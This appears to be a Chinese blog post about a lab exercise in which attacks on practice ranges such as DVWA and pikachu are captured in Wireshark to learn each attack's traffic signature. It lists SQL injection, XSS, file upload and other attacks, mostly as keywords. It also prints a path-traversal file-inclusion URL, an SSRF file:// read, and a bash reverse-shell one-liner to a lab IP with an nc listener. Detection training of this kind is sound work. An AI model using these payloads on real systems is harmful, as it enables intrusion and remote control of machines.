【项目】wireshark抓取攻击流量

最新推荐文章于 2024-05-07 19:59:44 发布
最新推荐文章于 2024-05-07 19:59:44 发布
阅读量534 收藏 7
点赞数 11
分类专栏: 项目 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134883537
版权

        演示如下漏洞的攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,要求过程截图描述,演示完回答如何判断该漏洞的流量特征.

1.sql注入

环境:sqli靶场

查看关键字:union、select、等sql语句

查看数据流


2.xss

关键字:<script>、alert、等HTML代码

查看数据流


3.文件上传

环境:dvwn靶场

关键字:一句话木马

查看数据流


4.文件包含

环境:dvwn靶场

http://10.9.47.3/dvwa_2.0.1/vulnerabilities/fi/?page=../../phpinfo.php

查看数据流


5.文件读取

环境:metinfo_6.0.0网站

查看数据流


6.ssrf

环境:pikachu靶场

?url=file:///c:/windows/system32/drivers/etc/hosts

查看数据流

7.shiro反序列化


8.jwt


9.暴力破解

环境:dvwn靶场

爆破

查看数据流


10.命令执行

环境:dvwn靶场

关键字:cmd命令。如:whoami。

查看数据流


11.反弹shell

环境:一台Linux系统机器,一台kali.

kali开启nc

nc -lvvp 4444

bash -c 'bash -i >& /dev/tcp/192.168.221.128/4444 0>&1'

执行命令

查看数据流

 

wj33333
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WireShark 网络流量分析抓包工具
09-06
Wireshark(前称Ethereal)是一个网络封包分析软件。 wireshark的特点是开源, 免费,跨平台,同时图形话界面,使用起来还是十分方便的。
wireshark抓取OMCI报文使用的omci.lua
06-30
wireshark抓取OMCI报文使用的omci.lua 1.把文件copy至wireshark安装目录(还有一个BinDecHex.lua文件也要复制到该目录),如C:\Program Files (x86)\Wireshark 2.更改init.lua文件,打开文件后,文件最后添加dofile(DATA_DIR.."omci.lua")
Kali Linux进行SYN Flood攻击
及时清醒,事事如意
03-12 566
SYN Flood利用TCP协议缺陷,它透过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或处理正常的服务请求。一个正常的TCP连接需要三次握手:首先客户端发送一个包含SYN标志的数据包,表明客户机请求与服务器进行信息的交互。其后服务器返回一个SYN/ACK的应答包,表示客户端的请求被接受。最后客户端再返回一个确认包ACK,这样才完成TCP连接。那么,在这个过程中是如何发生SYN Flood攻击呢?
使用wireshark抓取thrift协议接口调用
07-22
使用wireshark抓取thrift协议接口调用
Wireshark抓取的数据包.7z
03-08
EtherCAT主站SOEM -- 22 -- Wireshark抓取并分析EtherCAT数据,需要用到的数据包; 我自己使用 Wireshark抓取的数据包。 主要有两个包: BEIFU-倍福TwinCAT主站进行抓取数据。 Kinco-op-SOEM主站进行抓取数据。
计算机网络实验(Wireshark 抓包工具使用、WinPcap 编程、协议分析&流量统计程序的编写)
毕业作品网站
02-14 1万+
WinPcap 是一个基于 Win32 平台的,用于捕获网络数据包并进行分析的开源库;在 Linux 上也有对应的 LibPcap;目前 WinPcap 已经处于无人维护的状态,对于 Windows 10 有更新的且目前有人维护的开源项目 NpCap。大多数网络应用程序通过被广泛使用的操作系统元件来访问网络,比如 sockets——这是一种简单的实现方式,因为操作系统已经妥善处理了底层具体实现细节(比如协议处理,封装数据包等等工作),并且提供了一个与读写文件类似的,令人熟悉的接口;
流量分析:wireshark的使用
cc777777777的博客
04-07 3756
流量分析:wireshark的使用
Wireshark抓取攻击流量
2301_79089748的博客
12-10 369
漏洞的攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,要求过程截图描述,演示完回答如何判断该漏洞的流量特征。
web漏洞的攻击抓取攻击流量
xy_wjyjw的博客
12-09 974
以dvwa靶场为例,使用wireshark抓取攻击流量,并定位关键字段。
profinet报文,wireshark抓取
09-23
profinet协议以太网报文,可以用wireshark软件打开,适用于学习profinet报文解析,学习各种工业以太网协议可参考本人其他下载文件
wireshark官方文档第 9 章数据包解析
死胖子的博客
10-27 1742
第 9 章数据包解析 9.1.数据包解析的工作原理 对于一个已封装好的协议包,每个解析器(dissector)对其负责的一部分协议进行解码,然后将解码过程交给后续的解析器。 每个解析都从帧(Frame)解析器开始,它解析捕获文件本身的细节(例如时间戳)。从那里开始它将数据传递到最低级别的数据解析器,例如和以太网报头对应的以太网解析器。然后将有效载荷(payload)传递到下一个解析器(例如 IP),依此类推。在每个阶段,数据包的细节被解码和展示。 解析器可以内置到 Wireshark 中,也可以编.
Wireshark使用教程用户手册
热门推荐
seaship的博客
01-09 2万+
第 1 章 介绍 1.1. 什么是Wireshark Wireshark 是网络包分析工具。网络包分析工具的主要作用是尝试捕获网络包, 并尝试显示包的尽可能详细的情况。 你可以把网络包分析工具当成是一种用来测量有什么东西从网线上进出的测量工具,就好像使电工用来测量进入电信的电量的电度表一样。(当然比那个更高级) 过去的此类工具要么是过于昂贵,要么是属于某人私有,或者是二者兼顾。 Wireshark...
【QT】QT项目:自制Wireshark
Cappuccino Blog
08-09 1845
QT项目:自制Wireshark
iOS Wireshark抓包
weixin_33721427的博客
01-31 805
级别:★☆☆☆☆ 标签:「Wireshark for mac」「iOS TCP抓包」「iOS UDP抓包」 作者: Xs·H 审校: QiShare团队 在iOS应用开发过程中,通过抓包调试服务接口的场景时常出现。Charles和Wireshark是我在iOS开发过程中最常用的两款软件。 接上篇iOS Charles抓包,Charles是很强大的网络请求抓包工具,常用于抓包HTTP/HT...
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
NLOS的博客
05-05 436
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师会仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他会问自己这样的问题:“如果我是敌人,我会从哪里发起进攻?我的目标是什么?我会利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
内容安全(IPS入侵检测)
最新发布
m0_66993332的博客
05-07 457
入侵检测系统IPS
「 网络安全常用术语解读 」通用漏洞报告框架CVRF详解
网络安全
05-04 727
ICASI在推进多供应商协调漏洞披露方面处于领先地位,引入了通用漏洞报告框架(Common Vulnerability Reporting Format,CVRF)标准,制定了统一安全事件响应计划(USIRP)的原则,帮助创建了多方漏洞协调和披露指南和实践,并建立了一个成功协调多供应商应对众多安全事件的行业领导者信托小组。为了继续取得这些成功,并确保全球社会更广泛的参与,ICASI(Industry Consortium for Advancement of Security on the Internet
JAVA语言开发的(智慧校园系统源码)智慧校园的痛点、智慧校园的安全应用、智慧校园解决方案
爱笑的源码博客
05-07 1112
智慧校园的解决方案 1、基础设施建设:无线网络全覆盖:确保校园内所有区域都有稳定的无线网络信号,满足师生在教学、学习、科研和生活中的网络需求。 2、物联网部署:在教室、实验室、图书馆、宿舍等场所部署物联网设备,实现设备间的互联互通和智能管理。
wireshark如何抓取加密流量
03-27
Wireshark是一个开源的网络协议分析工具,它可以用于捕获和分析网络流量。然而,Wireshark默认情况下无法直接捕获加密的流量,因为它只能查看未经加密的数据包。 如果你想要捕获加密的流量,你需要使用一些额外的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值